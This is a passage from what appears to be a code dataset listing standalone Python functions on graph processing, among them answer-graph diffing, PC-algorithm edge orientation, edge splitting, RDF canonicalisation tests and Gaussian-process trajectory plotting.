answer1['node_bindings'][id1]\n for curie1 in bindings1:\n # store node id\n g1[curie1]['node'].add(id1)\n for id2 in answer2['node_bindings'].keys():\n # This is to handle cases where answer node id has a list or a string\n if isinstance(answer2['node_bindings'][id2], str):\n bindings2 = [answer2['node_bindings'][id2]]\n elif isinstance(answer2['node_bindings'][id2], list):\n bindings2 = answer2['node_bindings'][id2]\n for curie2 in bindings2:\n # store node id\n g2[curie2]['node'].add(id2)\n if curie1 == curie2:\n # stor intersection tuple\n g1[curie1]['intersection'].add(id1+\"|\"+id2)\n # iterate through all curies\n for curie in curie_set:\n # check if curie is from answer 1\n if curie in g1.keys():\n # check if in intersection\n if len(g1[curie]['intersection'])>0:\n diff_dict[\"-1|-1\"]['intersection'] += [self.node_dict1[curie]]\n for id1 in node_names1:\n for id2 in node_names2:\n node_tuple = id1+\"|\"+id2\n if id1 in g1[curie]['node'] and id2 in g2[curie]['node']:\n diff_dict[node_tuple]['intersection'] += [self.node_dict1[curie]]\n elif id1 in g1[curie]['node']:\n diff_dict[node_tuple]['g1-g2'] += [self.node_dict1[curie]]\n elif id2 in g2[curie]['node']:\n diff_dict[node_tuple]['g2-g1'] += [self.node_dict1[curie]]\n # If not in intersection store in g1-g2\n else:\n diff_dict[\"-1|-1\"]['g1-g2'] += [self.node_dict1[curie]]\n for id1 in g1[curie]['node']:\n # iterate through all answer 2 ids\n for id2 in node_names2:\n diff_dict[id1+\"|\"+id2]['g1-g2'] += [self.node_dict1[curie]]\n # if not in g1 but in g2 then in g2-g1\n elif curie in g2.keys():\n diff_dict[\"-1|-1\"]['g2-g1'] += [self.node_dict2[curie]]\n for id2 in g2[curie]['node']:\n # iterate through all answer 1 ids\n for id1 in node_names1:\n diff_dict[id1+\"|\"+id2]['g2-g1'] += [self.node_dict2[curie]]\n return diff_dict",
"def estimate_cpdag(self,skel_graph, sep_set):\n dag = skel_graph.to_directed()\n node_ids = skel_graph.nodes()\n for (i, j) in combinations(node_ids, 2):\n adj_i = set(dag.successors(i))\n if j in adj_i:\n continue\n adj_j = set(dag.successors(j))\n if i in adj_j:\n continue\n if sep_set[i][j] is None:\n continue\n common_k = adj_i & adj_j\n for k in common_k:\n if k not in sep_set[i][j]:\n if dag.has_edge(k, i):\n _logger.debug('S: remove edge (%s, %s)' % (k, i))\n dag.remove_edge(k, i)\n if dag.has_edge(k, j):\n _logger.debug('S: remove edge (%s, %s)' % (k, j))\n dag.remove_edge(k, j)\n\n def _has_both_edges(dag, i, j):\n return dag.has_edge(i, j) and dag.has_edge(j, i)\n\n def _has_any_edge(dag, i, j):\n return dag.has_edge(i, j) or dag.has_edge(j, i)\n\n def _has_one_edge(dag, i, j):\n return ((dag.has_edge(i, j) and (not dag.has_edge(j, i))) or\n (not dag.has_edge(i, j)) and dag.has_edge(j, i))\n\n def _has_no_edge(dag, i, j):\n return (not dag.has_edge(i, j)) and (not dag.has_edge(j, i))\n\n # For all the combination of nodes i and j, apply the following\n # rules.\n old_dag = dag.copy()\n while True:\n for (i, j) in combinations(node_ids, 2):\n # Rule 1: Orient i-j into i->j whenever there is an arrow k->i\n # such that k and j are nonadjacent.\n #\n # Check if i-j.\n if _has_both_edges(dag, i, j):\n # Look all the predecessors of i.\n for k in dag.predecessors(i):\n # Skip if there is an arrow i->k.\n if dag.has_edge(i, k):\n continue\n # Skip if k and j are adjacent.\n if _has_any_edge(dag, k, j):\n continue\n # Make i-j into i->j\n _logger.debug('R1: remove edge (%s, %s)' % (j, i))\n dag.remove_edge(j, i)\n break\n\n # Rule 2: Orient i-j into i->j whenever there is a chain\n # i->k->j.\n #\n # Check if i-j.\n if _has_both_edges(dag, i, j):\n # Find nodes k where k is i->k.\n succs_i = set()\n for k in dag.successors(i):\n if not dag.has_edge(k, i):\n succs_i.add(k)\n # Find nodes j where j is k->j.\n preds_j = set()\n for k in dag.predecessors(j):\n if not dag.has_edge(j, k):\n preds_j.add(k)\n # Check if there is any node k where i->k->j.\n if len(succs_i & preds_j) > 0:\n # Make i-j into i->j\n _logger.debug('R2: remove edge (%s, %s)' % (j, i))\n dag.remove_edge(j, i)\n\n # Rule 3: Orient i-j into i->j whenever there are two chains\n # i-k->j and i-l->j such that k and l are nonadjacent.\n #\n # Check if i-j.\n if _has_both_edges(dag, i, j):\n # Find nodes k where i-k.\n adj_i = set()\n for k in dag.successors(i):\n if dag.has_edge(k, i):\n adj_i.add(k)\n # For all the pairs of nodes in adj_i,\n for (k, l) in combinations(adj_i, 2):\n # Skip if k and l are adjacent.\n if _has_any_edge(dag, k, l):\n continue\n # Skip if not k->j.\n if dag.has_edge(j, k) or (not dag.has_edge(k, j)):\n continue\n # Skip if not l->j.\n if dag.has_edge(j, l) or (not dag.has_edge(l, j)):\n continue\n # Make i-j into i->j.\n _logger.debug('R3: remove edge (%s, %s)' % (j, i))\n dag.remove_edge(j, i)\n break\n\n # Rule 4: Orient i-j into i->j whenever there are two chains\n # i-k->l and k->l->j such that k and j are nonadjacent.\n #\n # However, this rule is not necessary when the PC-algorithm\n # is used to estimate a DAG.\n\n if nx.is_isomorphic(dag, old_dag):\n break\n old_dag = dag.copy()\n\n return dag",
"def cleanGraph(self,graph):\n i=0\n while i+1<len(graph):\n if self.getDistance(graph[i],graph[i+1])==0:\n del graph[i+1]\n else:\n i+=1\n return graph",
"def test_groups():\n graph = Graph()\n for one, two in [(1, 2), (2, 3), (1, 4), (4, 3), (3, 1)]:\n graph.add_edge(one, two)\n groups = graph.group()\n eq_(len(groups), 3)",
"def split_edges(self, maximum_distance):\n \"\"\" Iterate through the vertices of each section. For each vertex v, evaluate edges for which v is a source.\n If an edge of weight greater than maximum_distance, then split it. \"\"\"\n for section_id in self.sections:\n utils.print_progress(len(self.sections), prefix='splitting edges')\n current_section = [] # Need to update the section data after splitting the edges.\n for source in self.sections[section_id]:\n current_section.append(source)\n edges_to_remove = [] # If an edge is split, it will need to be removed.\n for edge in self.graph.get_out_edges(source):\n if self.edge_weights[edge] > maximum_distance:\n target = edge[1] # edge is a numpy array of [source, target, edge]. Select target.\n edges_to_remove.append(self.graph.edge(edge[0], edge[\n 1])) # If an edge is split, the original edge should be removed.\n\n new_edge_count = int(math.ceil(self.edge_weights[edge] / maximum_distance))\n new_edge_distance = self.edge_weights[edge] / new_edge_count\n current_point = shapes.Point.from_list(\n list(self.node_locations[source]) + [self.node_heading[target]])\n previous_vertex = source\n for _ in range(new_edge_count):\n current_point = utils.offset_point(current_point, new_edge_distance, current_point.bearing)\n current_vertex = self.graph.add_vertex()\n current_section.append(current_vertex) # The new vertex becomes a part of the section.\n \"\"\" Populate the property map for the new vertex. Inherit values from the target node,\n unless the target node is a junction node. Then inherit values from the source. \"\"\"\n self.node_locations[current_vertex] = current_point.as_list()\n self.node_heading[current_vertex] = current_point.bearing\n property_vertex = source if not self.junctions[target] else target\n self.node_speed_limit[current_vertex] = self.node_speed_limit[property_vertex]\n self.node_width[current_vertex] = self.node_width[property_vertex]\n self.node_id[current_vertex] = self.node_id[property_vertex]\n\n \"\"\" Create an edge between the previous vertex and the newly created vertex, \n and update the edge weight property map. \"\"\"\n current_edge = self.graph.add_edge(previous_vertex, current_vertex)\n self.edge_weights[current_edge] = new_edge_distance\n\n # The current vertex becomes the previous vertex in the next step.\n previous_vertex = current_vertex\n\n \"\"\" Create an edge between the last new vertex that was created and the target of the\n original edge which is being split, and update the property map. \"\"\"\n self.edge_weights[self.graph.add_edge(previous_vertex, target)] = new_edge_distance\n list(map(self.graph.remove_edge, edges_to_remove)) # Remove all relevant edges\n self.sections[section_id] = current_section # Update the section with the new vertices",
"def permute_graphs(a, b, seed=0):\n np.random.seed(seed)\n nodes = b.nodes()\n permuted_nodes = np.random.permutation(nodes)\n\n # matching of all labels of nodes in graph b to their new values\n match = gm.Matching(zip(nodes, permuted_nodes))\n new_edges = [(match.get_b(x), match.get_b(y)) for x, y in b.edges()]\n permuted_edges = [(x, y) for x, y in np.random.permutation(new_edges)]\n unneeded_nodes = set(nodes).difference(set(a.nodes()))\n for node in unneeded_nodes:\n match.pop_b(node)\n name = \"permuted_b(%s, %s, %s)\" % (\n a.name if a.name else hash(a), b.name if b.name else hash(b), seed)\n return a, nx.Graph(permuted_edges, name=name), match",
"def shareNoEdges(segment,neighbours,segmentsMeta):\n return np.fromiter(map(lambda x : haveNoSameEdges(segment,x,segmentsMeta),neighbours),np.bool)",
"def is_partition(graph, nodeset1, nodeset2):\n if len(nodeset1) < 1:\n return False\n if len(nodeset2) < 1:\n return False\n if(len(nodeset1.intersection(nodeset2)) > 0):\n return False\n return_list = []\n return_list2 = []\n for element in nodeset1:\n return_list.append(element)\n for element in nodeset2:\n return_list2.append(element)\n index = 0\n while index < len(return_list):\n for element in graph.get_node_neighbors(return_list[index]):\n if element not in return_list:\n return_list.append(element)\n index += 1\n index = 0\n while index < len(return_list2):\n for element in graph.get_node_neighbors(return_list2[index]):\n if element not in return_list2:\n return_list2.append(element)\n index += 1\n return len(set(return_list).intersection(set(return_list2))) < 1",
"def clean_edges(self):",
"def _find_unpaired_regions(self, graph, adjacency):\n graph_c = graph.copy()\n unpaired_nodes_list = []\n self._pair_based_graph_cut(graph_c)\n for component in nx.connected_components(graph_c):\n if len(component) >= adjacency:\n unpaired_nodes_list = unpaired_nodes_list + component\n return unpaired_nodes_list",
"def test_consistent_ids(self) -> None:\n bnode = BNode()\n g0_ts: _TripleSet = {\n (bnode, FOAF.name, Literal(\"Golan Trevize\")),\n (bnode, RDF.type, FOAF.Person),\n }\n bnode = BNode()\n g1_ts: _TripleSet = {\n (bnode, FOAF.name, Literal(\"Janov Pelorat\")),\n (bnode, RDF.type, FOAF.Person),\n }\n\n g0 = Graph()\n g0 += g0_ts\n cg0 = to_canonical_graph(g0)\n cg0_ts = GraphHelper.triple_set(cg0)\n\n g1 = Graph()\n g1 += g1_ts\n cg1 = to_canonical_graph(g1)\n cg1_ts = GraphHelper.triple_set(cg1)\n\n assert cg0_ts.issubset(\n cg1_ts\n ), \"canonical triple set cg0_ts should be a subset of canonical triple set cg1_ts\"",
"def construct_graph(a, b, w, time_arr, imp_arr, cost_arr, dist_arr):\n graph = {}\n for index,nodes in enumerate(zip(a,b)):\n # add unadded nodes to graph's keys with empty list\n if nodes[0] not in graph.keys():\n graph[nodes[0]] = []\n if nodes[1] not in graph.keys():\n graph[nodes[1]] = []\n # add unadded destination nodes as list [dest, weight]\n if nodes[1] not in graph[nodes[0]]:\n graph[nodes[0]].append([nodes[1], w[index], time_arr[index], imp_arr[index], cost_arr[index], dist_arr[index]])\n if nodes[0] not in graph[nodes[1]]:\n graph[nodes[1]].append([nodes[0], w[index], time_arr[index], imp_arr[index], cost_arr[index], dist_arr[index]])\n return graph",
"def report_graph_plotter(trajectory1, trajectory2, n_split, n_length, fraction, length):\r\n\r\n X, Y = GPy_get_X(trajectory1, keep_length=False, output_dim=3, length = length)\r\n Xprime, Yprime = GPy_get_X(trajectory2, keep_length=False, output_dim=3, length= length)\r\n\r\n # n_split = int(np.floor(np.shape(trajectory1)[-1]/2))\r\n # n_length = 3\r\n\r\n Y1, Y2, Y_mask = trajectory_splitter(trajectory1, n_split, n_length)\r\n Y1prime, Y2prime, Yprime_mask = trajectory_splitter(trajectory2, n_split, n_length)\r\n X1, X2, X_mask = trajectory_splitter(X.T, n_split, n_length)\r\n X1prime, X2prime, Xprime_mask = trajectory_splitter(X.T, n_split, n_length)\r\n X1, X2, X_mask = X1.T, X2.T, X_mask.T\r\n X1prime, X2prime, Xprime_mask = X1prime.T, X2prime.T, Xprime_mask.T\r\n\r\n throwaway1, GP1 = multi_dimensional_gaussian_plotter(Y1, extension_ratio=0., length=n_split*0.01/fraction, n_dimensions=3, fraction=1.)\r\n throwaway2, GP2 = multi_dimensional_gaussian_plotter(Y1prime, extension_ratio=0., length=n_split*0.01/fraction, n_dimensions=3, fraction=1.)\r\n\r\n # assert((intermediate1 == X1).all())\r\n # assert((intermediate2 == X1prime).all())\r\n\r\n Y1 = Y1[None, :, :] # treating each trajectory fragment as a separate bird.\r\n Y2 = Y2[None, :, :]\r\n Y1prime = Y1[None, :, :]\r\n Y2prime = Y2prime[None, :, :]\r\n # Y_mask = Y_mask[None, :, :]\r\n # Yprime_mask = Yprime_mask[None, :, :]\r\n\r\n # trajectories = np.ma.concatenate((Y_mask,Yprime_mask), axis=0)\r\n # print(f'The shape of the trajectories before is [2,{np.shape(trajectory1)}]\\nThe shape of Y_mask is {np.shape(Y_mask)}\\nThe shape of trajectories is {np.shape(trajectories)}')\r\n\r\n fig = plt.figure(figsize=(9.,4.))\r\n outer_grid = gridspec.GridSpec(1, 2, figure=fig, left=0.1, right=0.975,top=0.975, wspace=0.3)\r\n\r\n left_cell = gridspec.GridSpecFromSubplotSpec(1, 1, subplot_spec=outer_grid[0])\r\n\r\n ax = fig.add_subplot(left_cell[:, :])\r\n right_cell = outer_grid[1].subgridspec(5, 3, hspace=0.05)\r\n upper_right_cell = gridspec.GridSpecFromSubplotSpec(3, 1, subplot_spec=right_cell[:3, :], hspace=0.0)\r\n lower_right_cell = gridspec.GridSpecFromSubplotSpec(2, 1, subplot_spec=right_cell[3:, :], hspace=0.0)\r\n # upper_right_cell = right_Cell[:3, :].subgridspec(3, 1)\r\n # lower_right_cell = right_Cell[3:, :].subgridspec(2, 1)\r\n\r\n # axx = fig.add_subplot(right_cell[0, :])\r\n # axy = fig.add_subplot(right_cell[1, :])\r\n # axz = fig.add_subplot(right_cell[2, :])\r\n # ax2 = fig.add_subplot(right_cell[3, :])\r\n # ax3 = fig.add_subplot(right_cell[4, :])\r\n axx = fig.add_subplot(upper_right_cell[0])\r\n axy = fig.add_subplot(upper_right_cell[1], sharex=axx)\r\n axz = fig.add_subplot(upper_right_cell[2], sharex=axx)\r\n ax2 = fig.add_subplot(lower_right_cell[0], sharex=axx)\r\n ax3 = fig.add_subplot(lower_right_cell[1], sharex=axx)\r\n\r\n\r\n ax.set_xlabel('Z')\r\n ax.set_ylabel('Y')\r\n\r\n ax.plot(Y_mask[2,:],Y_mask[1,:], 'k-')\r\n ax.plot(Yprime_mask[2, :], Yprime_mask[1, :], 'b-')\r\n\r\n\r\n # inverse_mask = ~np.array(np.ma.getmask(Y_mask), dtype=bool)\r\n # Y_no_mask = np.ma.masked_array(Y_mask, ~np.ma.getmask(Y_mask))\r\n # Yprime_no_mask = np.ma.masked_array(Yprime_mask, ~np.ma.getmask(Yprime_mask))\r\n # ax.plot(Y_no_mask[2,:],Y_no_mask[1,:], 'k--')\r\n # ax.plot(Yprime_no_mask[2, :], Yprime_no_mask[1, :], 'b--')\r\n\r\n\r\n axins = ax.inset_axes([0.175, 0.15, 0.375, 0.35])\r\n axins.plot(Yprime_mask[2, :], Yprime_mask[0, :], 'b-')\r\n axins.plot(Y_mask[2,:],Y_mask[0,:], 'k-')\r\n # axins.plot(Yprime_no_mask[2, :], Yprime_no_mask[0, :], 'b--')\r\n # axins.plot(Y_no_mask[2,:],Y_no_mask[0,:], 'k--')\r\n axins.set_xlabel('Z')\r\n axins.set_ylabel('X')\r\n\r\n Y_mask.mask = np.ma.nomask\r\n Yprime_mask.mask = np.ma.nomask\r\n ax.plot(Y_mask[2,:],Y_mask[1,:], 'k:')\r\n ax.plot(Yprime_mask[2, :], Yprime_mask[1, :], 'b:')\r\n axins.plot(Yprime_mask[2, :], Yprime_mask[0, :], 'b:')\r\n axins.plot(Y_mask[2,:],Y_mask[0,:], 'k:')\r\n\r\n ax.tick_params(axis=\"both\", direction=\"in\", bottom=True, top=True, left=True, right=True)\r\n axins.tick_params(axis=\"both\", direction=\"in\", bottom=True, top=True, left=True, right=True)\r\n\r\n axx.tick_params(axis=\"both\", direction=\"in\", bottom=True, top=True, left=True, right=True)\r\n axy.tick_params(axis=\"both\", direction=\"in\", bottom=True, top=True, left=True, right=True)\r\n axz.tick_params(axis=\"both\", direction=\"in\", bottom=True, top=True, left=True, right=True)\r\n ax2.tick_params(axis=\"both\", direction=\"in\", bottom=True, top=True, left=True, right=True)\r\n ax3.tick_params(axis=\"both\", direction=\"in\", bottom=True, top=True, left=True, right=True)\r\n ax2.tick_params(axis=\"both\", labelbottom=False)\r\n axx.tick_params(axis=\"both\", labelbottom=False)\r\n axy.tick_params(axis=\"both\", labelbottom=False)\r\n axz.tick_params(axis=\"both\", labelbottom=False)\r\n\r\n X_list = [X1, X1, X1]\r\n Xprime_list = [X1prime, X1prime, X1prime]\r\n slices = GPy.util.multioutput.get_slices(X_list)\r\n slicesprime = GPy.util.multioutput.get_slices(Xprime_list)\r\n assert((slices == slicesprime))\r\n\r\n axx.set_ylabel('X')\r\n axy.set_ylabel('Y')\r\n axz.set_ylabel('Z')\r\n ax3.set_xlabel('Time')\r\n ax3.set_ylabel('Incorrect\\nMatching')\r\n ax2.set_ylabel('Correct\\nMatching')\r\n\r\n xlim = [(n_split+n_length)*0.01/fraction + 0.1, length] # Can't be bothered to do the maths to work out why the 0.1 works. multiply by 0.01 for the timesteps.divid by fraction for beginning.\r\n ax2.set_xlim(xlim)\r\n # ax2.set_ylim(-4,3.5)\r\n # ax3.set_ylim(-11,15)\r\n # ax3.set_xlim(xlim)\r\n\r\n # GP1.plot(plot_limits=xlim, ax=axx, fixed_inputs=[(1, 0)], which_data_rows=slices[0], legend=False, marker='+')\r\n # GP1.plot(plot_limits=xlim, ax=axy, fixed_inputs=[(1, 1)], which_data_rows=slices[1], legend=False, marker='+')\r\n # GP1.plot(plot_limits=xlim, ax=axz, fixed_inputs=[(1, 2)], which_data_rows=slices[2], legend=False, marker='+')\r\n # GP2.plot(plot_limits=xlim, ax=axx, fixed_inputs=[(1, 0)], which_data_rows=slicesprime[0], legend=False, marker='+')\r\n # GP2.plot(plot_limits=xlim, ax=axy, fixed_inputs=[(1, 1)], which_data_rows=slicesprime[1], legend=False, marker='+')\r\n # GP2.plot(plot_limits=xlim, ax=axz, fixed_inputs=[(1, 2)], which_data_rows=slicesprime[2], legend=False, marker='+')\r\n\r\n\r\n num_samples = 5\r\n\r\n Xnewx = np.concatenate((X2, np.ones_like(X2)-1), axis=1)\r\n noise_dict = {'output_index': Xnewx[:, 1:].astype(int)}\r\n Xpred, Xvar = GP1.predict(Xnewx,Y_metadata=noise_dict)\r\n Xnewx = np.concatenate((X2, np.ones_like(X2)-1), axis=1)\r\n noise_dict = {'output_index': Xnewx[:, 1:].astype(int)}\r\n Xpred_prime, Xprime_var = GP2.predict(Xnewx,Y_metadata=noise_dict)\r\n Xquantiles = np.array(GP1.predict_quantiles(Xnewx,Y_metadata=noise_dict))\r\n Xsamples = GP1.posterior_samples(Xnewx, Y_metadata=noise_dict, size=num_samples)\r\n Xprime_quantiles = np.array(GP2.predict_quantiles(Xnewx,Y_metadata=noise_dict))\r\n Xprime_samples = GP2.posterior_samples(Xnewx, Y_metadata=noise_dict, size=num_samples)\r\n\r\n Ynewx = np.concatenate((X2, np.ones_like(X2)), axis=1)\r\n noise_dict = {'output_index': Ynewx[:, 1:].astype(int)}\r\n Ypred, Yvar = GP1.predict(Ynewx,Y_metadata=noise_dict)\r\n Ynewx = np.concatenate((X2, np.ones_like(X2)), axis=1)\r\n noise_dict = {'output_index': Ynewx[:, 1:].astype(int)}\r\n Ypred_prime, Yprime_var = GP2.predict(Ynewx,Y_metadata=noise_dict)\r\n Yquantiles = np.array(GP1.predict_quantiles(Ynewx,Y_metadata=noise_dict))\r\n Ysamples = GP1.posterior_samples(Ynewx, Y_metadata=noise_dict, size=num_samples)\r\n Yprime_quantiles = np.array(GP2.predict_quantiles(Ynewx,Y_metadata=noise_dict))\r\n Yprime_samples = GP2.posterior_samples(Ynewx, Y_metadata=noise_dict, size=num_samples)\r\n\r\n\r\n Znewx = np.concatenate((X2, np.ones_like(X2)+1), axis=1)\r\n noise_dict = {'output_index': Znewx[:, 1:].astype(int)}\r\n Zpred, Zvar = GP1.predict(Znewx,Y_metadata=noise_dict)\r\n Znewx = np.concatenate((X2, np.ones_like(X2)+1), axis=1)\r\n noise_dict = {'output_index': Znewx[:, 1:].astype(int)}\r\n Zpred_prime, Zprime_var = GP2.predict(Znewx,Y_metadata=noise_dict)\r\n Zquantiles = np.array(GP1.predict_quantiles(Znewx,Y_metadata=noise_dict))\r\n Zsamples = GP1.posterior_samples(Znewx, Y_metadata=noise_dict, size=num_samples)\r\n Zprime_quantiles = np.array(GP2.predict_quantiles(Znewx,Y_metadata=noise_dict))\r\n Zprime_samples = GP2.posterior_samples(Znewx, Y_metadata=noise_dict, size=num_samples)\r\n\r\n\r\n # axx.fill_between(x=Xnewx[:, 0], y1=Xquantiles[0, :, 0], y2=Xquantiles[1, :, 0], color='black', alpha=0.05)\r\n # axx.fill_between(x=Xnewx[:, 0], y1=Xprime_quantiles[0, :, 0], y2=Xprime_quantiles[1, :, 0], color='blue', alpha=0.05)\r\n # axy.fill_between(x=Xnewx[:, 0], y1=Yquantiles[0, :, 0], y2=Yquantiles[1, :, 0], color='black', alpha=0.05)\r\n # axy.fill_between(x=Xnewx[:, 0], y1=Yprime_quantiles[0, :, 0], y2=Yprime_quantiles[1, :, 0], color='blue',alpha=0.05)\r\n # axz.fill_between(x=Xnewx[:, 0], y1=Zquantiles[0, :, 0], y2=Zquantiles[1, :, 0], color='black', alpha=0.05)\r\n # axz.fill_between(x=Xnewx[:, 0], y1=Zprime_quantiles[0, :, 0], y2=Zprime_quantiles[1, :, 0], color='blue',alpha=0.05)\r\n\r\n axx.fill_between(x=Xnewx[:, 0], y1=Xpred[:,0]-Xvar[:,0]**0.5, y2=Xpred[:,0]+Xvar[:,0]**0.5, color='black', alpha=0.05)\r\n axx.fill_between(x=Xnewx[:, 0], y1=Xpred_prime[:,0]-Xprime_var[:,0]**0.5, y2=Xpred_prime[:,0]+Xprime_var[:,0]**0.5, color='blue', alpha=0.05)\r\n axy.fill_between(x=Xnewx[:, 0], y1=Ypred[:,0]-Yvar[:,0]**0.5, y2=Ypred[:,0]+Yvar[:,0]**0.5, color='black', alpha=0.05)\r\n axy.fill_between(x=Xnewx[:, 0], y1=Ypred_prime[:,0]-Yprime_var[:,0]**0.5, y2=Ypred_prime[:,0]+Yprime_var[:,0]**0.5, color='blue', alpha=0.05)\r\n axz.fill_between(x=Xnewx[:, 0], y1=Zpred[:,0]-Zvar[:,0]**0.5, y2=Zpred[:,0]+Zvar[:,0]**0.5, color='black', alpha=0.05)\r\n axz.fill_between(x=Xnewx[:, 0], y1=Zpred_prime[:,0]-Zprime_var[:,0]**0.5, y2=Zpred_prime[:,0]+Zprime_var[:,0]**0.5, color='blue', alpha=0.05)\r\n\r\n # axx.plot(X2, Xpred, 'k--', alpha=0.5)\r\n # axx.plot(X2, Xpred_prime, 'b--', alpha=0.5)\r\n # axy.plot(X2, Ypred, 'k--', alpha=0.5)\r\n # axy.plot(X2, Ypred_prime, 'b--', alpha=0.5)\r\n # axz.plot(X2, Zpred, 'k--', alpha=0.5)\r\n # axz.plot(X2, Zpred_prime, 'b--', alpha=0.5)\r\n\r\n # axx.scatter(X2[:, 0], Y2[0, 0, :], color='k', marker='x', s=50*(72./fig.dpi)**2)\r\n # axx.scatter(X2[:, 0], Y2prime[0, 0, :], color='b', marker='x', s=50*(72./fig.dpi)**2)\r\n # axy.scatter(X2[:, 0], Y2[0, 1, :], color='k', marker='1', s=50*(72./fig.dpi)**2)\r\n # axy.scatter(X2[:, 0], Y2prime[0, 1, :], color='b', marker='1', s=50*(72./fig.dpi)**2)\r\n # axz.scatter(X2[:, 0], Y2[0, 2, :], color='k', marker='+', s=50*(72./fig.dpi)**2)\r\n # axz.scatter(X2[:, 0], Y2prime[0, 2, :], color='b', marker='+', s=50*(72./fig.dpi)**2)\r\n\r\n axx.plot(X2[:, 0], Y2[0, 0, :], color='k', linestyle=':', alpha=0.5) # , s=50*(72./fig.dpi)**2)\r\n axx.plot(X2[:, 0], Y2prime[0, 0, :], color='b', linestyle=':', alpha=0.5) # , s=50*(72./fig.dpi)**2)\r\n axy.plot(X2[:, 0], Y2[0, 1, :], color='k', linestyle='--', alpha=0.5) # , s=50*(72./fig.dpi)**2)\r\n axy.plot(X2[:, 0], Y2prime[0, 1, :], color='b', linestyle='--', alpha=0.5) # , s=50*(72./fig.dpi)**2)\r\n axz.plot(X2[:, 0], Y2[0, 2, :], color='k', linestyle='-.', alpha=0.5) # , s=50*(72./fig.dpi)**2)\r\n axz.plot(X2[:, 0], Y2prime[0, 2, :], color='b', linestyle='-.', alpha=0.5) # , s=50*(72./fig.dpi)**2)\r\n\r\n Xresiduals = (Y2[0, 0, :] - Xpred[:,0])/Xvar[:,0]**0.5\r\n Yresiduals = (Y2[0, 1, :] - Ypred[:,0])/Yvar[:,0]**0.5\r\n Zresiduals = (Y2[0, 2, :] - Zpred[:,0])/Zvar[:,0]**0.5\r\n # ax2.scatter(X2[:, 0], Xresiduals, color='k', marker='x', alpha=0.3)# , s=(72./fig.dpi)**2)\r\n # ax2.scatter(X2[:, 0], Yresiduals, color='k', marker='1', alpha=0.3)# , s=(72./fig.dpi)**2)\r\n # ax2.scatter(X2[:, 0], Zresiduals, color='k', marker='+', alpha=0.3)# , s=(72./fig.dpi)**2)\r\n ax2.plot(X2[:, 0], Xresiduals, color='k', linestyle=':', alpha=0.5) # , s=(72./fig.dpi)**2)\r\n ax2.plot(X2[:, 0], Yresiduals, color='k', linestyle='--', alpha=0.5) # , s=(72./fig.dpi)**2)\r\n ax2.plot(X2[:, 0], Zresiduals, color='k', linestyle='-.', alpha=0.5) # , s=(72./fig.dpi)**2)\r\n\r\n Xprime_residuals = (Y2prime[0, 0, :] - Xpred_prime[:, 0])/Xprime_var[:,0]**0.5\r\n Yprime_residuals = (Y2prime[0, 1, :] - Ypred_prime[:, 0])/Yprime_var[:,0]**0.5\r\n Zprime_residuals = (Y2prime[0, 2, :] - Zpred_prime[:, 0])/Zprime_var[:,0]**0.5\r\n # ax2.scatter(X2[:, 0], Xprime_residuals, color='b', marker='x', alpha=0.3) # , s=(72./fig.dpi)**2)\r\n # ax2.scatter(X2[:, 0], Yprime_residuals, color='b', marker='1', alpha=0.3) # , s=(72./fig.dpi)**2)\r\n # ax2.scatter(X2[:, 0], Zprime_residuals, color='b', marker='+', alpha=0.3) # , s=(72./fig.dpi)**2)\r\n ax2.plot(X2[:, 0], Xprime_residuals, color='b', linestyle=':', alpha=0.5) # , s=(72./fig.dpi)**2)\r\n ax2.plot(X2[:, 0], Yprime_residuals, color='b', linestyle='--', alpha=0.5) # , s=(72./fig.dpi)**2)\r\n ax2.plot(X2[:, 0], Zprime_residuals, color='b', linestyle='-.', alpha=0.5) # , s=(72./fig.dpi)**2)\r\n\r\n\r\n bad_Xresiduals = (Y2prime[0, 0, :] - Xpred[:, 0])/Xvar[:,0]**0.5\r\n bad_Yresiduals = (Y2prime[0, 1, :] - Ypred[:, 0])/Yvar[:,0]**0.5\r\n bad_Zresiduals = (Y2prime[0, 2, :] - Zpred[:, 0])/Zvar[:,0]**0.5\r\n # ax3.scatter(X2[:, 0], bad_Xresiduals, color='k', marker='x', alpha=0.3)# , s=(72./fig.dpi)**2)\r\n # ax3.scatter(X2[:, 0], bad_Yresiduals, color='k', marker='1', alpha=0.3)# , s=(72./fig.dpi)**2)\r\n # ax3.scatter(X2[:, 0], bad_Zresiduals, color='k', marker='+', alpha=0.3)# , s=(72./fig.dpi)**2)\r\n ax3.plot(X2[:, 0], bad_Xresiduals, color='k', linestyle=':', alpha=0.5)# , s=(72./fig.dpi)**2)\r\n ax3.plot(X2[:, 0], bad_Yresiduals, color='k', linestyle='--', alpha=0.5)# , s=(72./fig.dpi)**2)\r\n ax3.plot(X2[:, 0], bad_Zresiduals, color='k', linestyle='-.', alpha=0.5)# , s=(72./fig.dpi)**2)\r\n\r\n\r\n bad_Xprime_residuals = (Y2[0, 0, :] - Xpred_prime[:,0])/Xprime_var[:,0]**0.5\r\n bad_Yprime_residuals = (Y2[0, 1, :] - Ypred_prime[:,0])/Yprime_var[:,0]**0.5\r\n bad_Zprime_residuals = (Y2[0, 2, :] - Zpred_prime[:,0])/Zprime_var[:,0]**0.5\r\n # ax3.scatter(X2[:, 0], bad_Xprime_residuals, color='b', marker='x', alpha=0.3) # , s=(72./fig.dpi)**2)\r\n # ax3.scatter(X2[:, 0], bad_Yprime_residuals, color='b', marker='1', alpha=0.3) # , s=(72./fig.dpi)**2)\r\n # ax3.scatter(X2[:, 0], bad_Zprime_residuals, color='b', marker='+', alpha=0.3) # , s=(72./fig.dpi)**2)\r\n ax3.plot(X2[:, 0], bad_Xprime_residuals, color='b', linestyle=':', alpha=0.5) # , s=(72./fig.dpi)**2)\r\n ax3.plot(X2[:, 0], bad_Yprime_residuals, color='b', linestyle='--', alpha=0.5) # , s=(72./fig.dpi)**2)\r\n ax3.plot(X2[:, 0], bad_Zprime_residuals, color='b', linestyle='-.', alpha=0.5) # , s=(72./fig.dpi)**2)\r\n # ylabels = axz.get_yticklabels()\r\n # print(ylabels)\r\n\r\n # X2_list = [X2, X2, X2]\r\n #\r\n # print(GP3.log_predictive_density())\r\n return fig.show()",
